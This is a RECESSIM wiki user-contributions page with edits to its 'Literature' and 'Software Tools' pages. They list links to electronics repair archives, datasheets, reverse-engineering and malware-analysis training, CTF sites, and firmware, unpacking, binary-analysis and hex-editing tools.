RECESSIM - User contributions [en]

Literature

2026-04-05T01:13:39Z

Polymorphic7: add clevo mirror

Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|<nowiki>Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.</nowiki>]]

===Books and Magazines===
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)

::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew "bunnie" Huang

::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew "bunnie" Huang

::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).

::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity & reverse engineering.

===Datasheets, boardviews, schematics, manuals===

====Generic (various fields)====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''

::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.

::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website

::[https://www.espec.ws/ espec.ws] [https://www.google.com/search?q=file%3Apdf%20site%3Ahttps%3A%2F%2Fmonitor.espec.ws%2Ffiles 1e100 Dork]- Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.

::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....

::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.

::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].

::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.

::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.

::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.

::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics

::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.

::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..

::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.

====Portable computers, smartphones, videocards, printers, TVs====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''

::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.

::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.

::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.

::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.

::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.

::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.

::[https://www.alisaler.com/ AliSaler] - Website offering EC & Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.

::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.

::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic & boardviews downloads. Desktop bios dumps, and free repair tips.

::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.

::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).

::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.

::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.

::[https://www.smarttvmanuals.net/ Smart Tv Manuals & Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.

::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.

::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.

::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).

::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops & desktop schematic diagrams and BIOS downloads.

::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..

::[https://repo.palkeo.com/clevo-mirror/ palkeo Clevo Mirror] - Third party Clevo notebook bioses and manual mirror.

=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.

::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.

::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Collection of smartphone schematics.

=====Software for opening Boardview files=====

::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]

====GPU Repair====
::[https://levirepair.eu/infusions/forum/viewthread.php?thread_id=10&pid=72#post_72 LeviRepair] is a specialized online forum and community focused on technical GPU repair, diagnostics, and component-level troubleshooting. It acts as a knowledge base for repairing graphics cards, covering topics like VRAM testing, bios flashing, and hardware repairs for NVIDIA and AMD cards.

====Retro PC Hardware====
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!

::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.

====Vintage Audio Equipment Schematics / Manuals====
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.

====Paid sources (various fields)====
Most of the websites provide free service manuals and boardviews, '''but some unfortunately don't or have been PAYWALLED (badcaps.net as of 2026). '''

::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum & Schematic Search <--- Pay 2 download..

::[https://vinafix.com/ Vinafix] - Vinafix Electronics Repair Forum & Schematic Search <--- Pay 2 download..

----

===SMD Marking Codes Database===

'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.''' 
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.''' 

::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.

::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.

::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..

::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.

::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.

::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.

::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..

===IC Equivlent Database===

'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross-reference search for an equivalent IC.'''

::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.

::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.

===Hardware pinouts (web-based)===

::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.

::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.

----

===Find a image of the PCB without opening the device===
:# Modify the link below replace "example" without quotes with the product name and model you want to find
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.
::<pre>https://www.google.com/search?tbm=isch&q=example+internal+site:fccid.io</pre>

::Note that there will be no results if the device does not have a wireless receiver or transmitter inside. Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.
::[https://fccid.io/search.php FCCID.io search direct link]

====Electronic certification databases====
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.''' 
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission. 
For legal sale of wireless devices in the US.
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used. 
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.

::* FCC.Report. Provides this easily searchable FCC ID database.
:::: [https://fcc.report/FCC-ID/ -> FCC.Report]
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets.
:::: [https://device.report/ -> Device.Report]

----

===Digital Education===
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.

====Reverse Engineering Guides====
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge.

::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.

::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures.

=====Ghidra Documents=====
'''Class material linked from ghidra.re. Use arrow keys on keyboard to move through slides.'''
======Beginner======
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]
======Intermediate======
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]
======Advanced (PDF)======
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]
======Advanced Development======
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]
======Debugger======
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]
======BSim======
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]

=====IDA Material=====

::[[File:Reverse Engineering Malware IDA & Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA & Olly x86 (5 parts) by otw.

::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]

::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].

=====x64dbg=====

::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction & documentation page.

=====Immunity Debugger=====

::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.

=====Malware Reverse Engineering=====

::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of "Malware Reverse Engineering".

::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.

::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.

=====Anti Debugging Protection Techniques with Examples=====
======x86 (Win32)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.

::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.

::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals.

======x64 (Win64)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

====Machine code or virtual machine bytecode reference====

=====Assembly reference / manuals=====

======x86======

::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).

======x86 Training======
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.

::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.

======x86 and amd64======

::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.

=====Bytecode reference=====
======Java Virtual Machine (JVM)======

::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.

::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.

======Dalvik opcodes (Android)======

::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.

::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.

======Common Language Runtime (CLR) .NET======

::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.

::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).

====Reverse Engineering Challenges====

::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.

::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.

====Security Training Classes====

::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.

====Security CTF====
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called "flags", which are secretly hidden in purposefully vulnerable programs or websites. 
Learn more about reverse engineering and cybersecurity start playing CTF's.

::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).

::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.

::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.

::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.

::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.

::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.

::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.

::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.

::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.

====Embedded security Challenge (ESC)====

::[https://github.com/TrustworthyComputing/csaw_esc_2025 csaw_esc_2025] - CSAW 2025 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).

====800 MHz AMPS Documentation====
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.

Software Tools

2026-04-05T00:54:56Z

Polymorphic7: fix url

[[File:Software_wiki_banner.png|frameless|1280x300px]]

Disassemblers, decompilers, software development tools, pcb development suites, cryptographic tools, and other reverse engineering software. If you used it while reverse engineering, list it here!
==Tool Index==
 

====RF Signals Analysis====

*[https://github.com/jopohl/urh Universal Radio Hacker] - tool to analyze and extract data from SDR-captured radio signals (especially pilots, [[Wikipedia:ISM_radio_band|ISM RF]] devices, etc). See youtube for tutorials and examples.

*[https://www.gnuradio.org/ GNU Radio] - toolkit that provides signal processing blocks to implement software-defined radios and signal processing systems.

*[https://github.com/cjcliffe/CubicSDR CubicSDR] - is a cross-platform Software-Defined Radio application which allows you to navigate the radio spectrum and demodulate any signals you might discover.

*[https://github.com/audacity/audacity Audacity] - is a audio editor that can be used to cleanup the radio waves captured by a [[Wikipedia:Software-defined_radio|SDR]] or Software Defined Radio. (Example: Start Audacity -> Import –> Raw Data -> Radio Wave File)

----

====Firmware Analysis====

*[https://github.com/ReFirmLabs/binwalk binwalk] - Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.

*[https://github.com/attify/firmware-analysis-toolkit FAT] - is a toolkit built in order to help security researchers analyze and identify vulnerabilities in IoT and embedded device firmware.

*[https://github.com/e-m-b-a/emba EMBA] - is designed as the central firmware analysis tool for penetration testers and product security teams. It supports the complete security analysis process starting with firmware extraction, doing static analysis and dynamic analysis via emulation and finally generating a web report.

*[https://github.com/rampageX/firmware-mod-kit Firmware Modification Kit] - is a collection of scripts and utilities to extract and rebuild linux based firmware images.

*[https://github.com/craigz28/firmwalker Firmwalker] - is a script for searching the extracted firmware file system for goodies!

====Setup Extractors / Overlay Unpackers / Virtualization Wrappers====

*[https://innounp.sourceforge.net/ innounp] - the Inno Setup Unpacker.

*[https://github.com/Bioruebe/UniExtract2 Universal Extractor 2 (UniExtract2)] - is a tool designed to extract files from any type of extractable file.

*[https://github.com/activescott/lessmsi lessmsi] - a tool to view and extract the contents of an Windows Installer (.msi) file.

*[https://github.com/crackinglandia/fuu FUU] - [F]aster [U]niversal [U]npacker.

=====Themida Reverse Engineering=====

*[https://github.com/ergrelet/themida-unmutate themida-unmutate] - is a static deobfuscator for Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.

*[https://github.com/sodareverse/TDE TDE] - is a devirtualization engine for Themida. Supported FISH VMA versions: 2.2.5.0, 2.2.6.0, 2.2.7.0.

*[https://github.com/ergrelet/unlicense unlicense] - is a dynamic unpacker and import fixer for Themida/WinLicense 2.x and 3.x mostly used for malware-analysis.

=====VMProtect Reverse Engineering=====

======VMProtect 2======

*[https://git.back.engineering/vmp2/ vmp2] - Resources provided by Back Engineering Labs regarding VMProtect 2 Reverse Engineering (x64 PE Only).
*vmemu (VMProtect 2 Virtual Machine Handler Emulation)
*vmassembler (VMProtect 2 Virtual Instruction Assembler)
*vmprofiler (VMProtect 2 Virtual Machines Profiler Library)
*vmprofiler-cli (VMProtect 2 CLI Virtual Machine Information Displayer)
*vmhook (VMProtect 2 Virtual Machine Hooking Library)
*vmprofiler-qt (VMProtect 2 Qt Virtual Instruction Inspector)
*um-hook (VMProtect 2 Usermode Virtual Instruction Hook Demo)
*vmdevirt (VMProtect Devirtualization)

======VMProtect 3======

*[https://git.back.engineering/vmp3/ vmp3] - Resources provided by Back Engineering Labs regarding VMProtect 3 Reverse Engineering (x64 PE Only).
*vmdevirt (VMProtect 3 Static Devirtualization)
*vmprofiler (VMProtect 3 Virtual Machines Profiler Library)
*vmemu (VMProtect 3 Virtual Machine Handler Emulation)

=====Code Virtualizer (Oreans Technologies)=====

*[https://github.com/pakt/decv devc] - ia s decompiler for Code Virtualizer 1.3.8 (Oreans).
*[https://gdtr.wordpress.com/2012/10/03/decv-a-decompiler-for-code-virtualizer-by-oreans/ decv] - [blog post] a decompiler for Code Virtualizer by Oreans.
*[https://github.com/67-6f-64/AntiOreans-CodeDevirtualizer AntiOreans-CodeDevirtualizer] - is a proof-of-concept devirtualization engine for Themida/Oreans-CodeDevirtualizer.

=====Enigma Protector=====

*[https://github.com/mos9527/evbunpack evbunpack] - is a Enigma Virtual Box Unpacker. Supported versions: 11.00, 10.70, 9.70, and 7.80.

======OllyDbg Scripts======
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%201.90%20-%203.xx%20Alternativ%20Unpacker%20v1.0.txt Enigma Protector 1.90–3.xx Unpacker]
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%204.xx%20VM%20API%20Fixer%20v0.5.0.txt Enigma Protector 4.xx VM API Fixer]

=====Generic Code Virtualizer=====

*[https://github.com/jnraber/VirtualDeobfuscator VirtualDeobfuscator] - is a reverse engineering tool for virtualization wrappers.

====Reverse Engineering Toolkit AIO====
=====Windows‑focused=====
*[https://github.com/Jakiboy/ReVens ReVens] - is a Windows-based Reverse Engineering Toolkit "All-In-One", Built for Security (Malware analysis, Penetration testing) & Educational purposes.
*[https://github.com/mentebinaria/retoolkit retoolkit] - is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems.
*[https://github.com/byte2mov/re-kit-2.0 re-kit 2.0] - is a reverse engineering toolkit made for fighting malware and analyzing programs.
*[https://github.com/zer0condition/ReverseKit ReverseKit] - is a comprehensive toolkit designed to aid reverse engineers in the process of dynamic RE.

=====Android‑focused=====
*[https://github.com/RevEngiSquad/revengi-app RevEngi] - is a all-in-one toolkit for reverse engineering: Smali Grammar, DexRepair, Flutter Analysis and much more...

====Binary PE Analysis / Editor (Windows)====

*[https://web.archive.org/web/20210331144912/https://protectionid.net/ ProtectionID] - Great little tool to scan a Windows binary payload for overlays and packers. [[Media:ProtectionId.690.December.2017.zip]] [https://www.virustotal.com/gui/file/26c54eb376183d508ee129531728f9e01d30f0df29d7621f390e8f0ea6a1c79c/community VT link], pw: recessim.com

*[https://github.com/horsicq/Detect-It-Easy Detect-It-Easy] - abbreviated "DIE" is a program for determining types of files. "DIE" is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS.

*[https://www.mitec.cz/exe.html MiTeC Portable Executable Reader/Explorer] - is a tool that reads and displays executable file properties and structures. It is compatible with PE32 (Portable Executable), PE32+ (64bit), NE (Windows 3.x New Executable) and VxD (Windows 9x Virtual Device Driver) file types. .NET executables are supported too.

*[https://github.com/ExeinfoASL/ASL ExeInfoPe] - is a tool that can detect packers, compilers, protectors, .NET obfuscators, PUA applications.

*[https://github.com/hasherezade/pe-bear PE-bear] - is a Portable Executable reversing tool with a friendly GUI using the Capstone Engine and is Open Source!

*[https://ntcore.com/?page_id=388 CFF Explorer] - is a PE editor called CFF Explorer and a process viewer with a lot of features.

*[https://web.archive.org/web/20220331063153/http://www.rdgsoft.net/ RDG Packer Detector] - is a detector for packers, cryptors, compilers, installers.

*[https://github.com/petoolse/petools/ PE Tools] - is a portable executable (PE) manipulation toolkit.

*[https://github.com/zedxxx/rccextended RccExtended] - is a resource compiler and decompiler for Qt binaries (files with the .rcc extension).

====Hex Editors====

*[https://github.com/WerWolv/ImHex ImHex] - is a Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.

*[https://mh-nexus.de/en/hxd/ HxD] - is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.

*[https://www.x-ways.net/winhex/ WinHex] - is in its core a universal hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security.

*[https://malcat.fr/index.html MalCat] - is a feature-rich hexadecimal editor / disassembler for Windows and Linux targeted to IT-security professionals. Inspect more than 40 binary file formats, dissassemble and decompile different CPU architectures, extract embedded files and scan for Yara signatures or anomalies in a fast and easy-to-use graphical interface.

====Pattern Matching / Pattern Searching====

*[https://github.com/VirusTotal/yara Yara] - is a pattern matching swiss knife in the IT Security Researchers branch.

*[https://github.com/BurntSushi/ripgrep ripgrep (rg)] - is a line-oriented search tool that recursively searches the current directory for a regex pattern. By default, ripgrep will respect gitignore rules and automatically skip hidden files/directories and binary files.

*[https://linux.die.net/man/1/grep grep] - searches the named input FILEs (or standard input if no files are named, or if a single hyphen-minus (-) is given as file name) for lines containing a match to the given PATTERN. By default, grep prints the matching lines.

*[https://github.com/stefankueng/grepWin grepWin] - is a simple yet powerful search and replace tool which can use regular expressions to do its job. This allows to do much more powerful searches and replaces.

*[https://astrogrep.sourceforge.net/ AstroGrep] - is a Microsoft Windows grep utility. Grep is a UNIX command-line program which searches within files for keywords. AstroGrep supports regular expressions, versatile printing options, stores most recently used paths and has a "context" feature which is very nice for looking at source code.

====Comparison Tools (Binary differences)====

*[https://github.com/joxeankoret/diaphora Diaphora] - is the most advanced Free and Open Source program diffing tool.

*[https://github.com/google/bindiff BinDiff] - is an open-source comparison tool for binary files to quickly find differences and similarities in disassembled code.

*[https://github.com/clearbluejar/ghidriff Ghidriff] - is a command-line binary diffing tool that uses Ghidra to identify differences between two binaries.

*[https://github.com/quarkslab/qbindiff QBinDiff] - is an experimental binary diffing tool addressing the diffing as a Network Alignement Quadratic Problem.

*[https://book.rada.re/tools/radiff2/binary_diffing.html radiff2] - is a binary diffing utility that is part of the radare2 framework.

*[https://github.com/bmaia/binwally binwally] - is a binary and directory tree comparison tool using Fuzzy Hashing concept (ssdeep).

====IAT Reconstructors (Windows)====

*[https://github.com/x64dbg/Scylla NtQuery Scylla] - is a Windows Portable Executable imports reconstructor Open Source and part of x64dbg.

====Process Monitors (Windows)====

*[https://github.com/winsiderss/systeminformer/ System Informer] - is a free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.

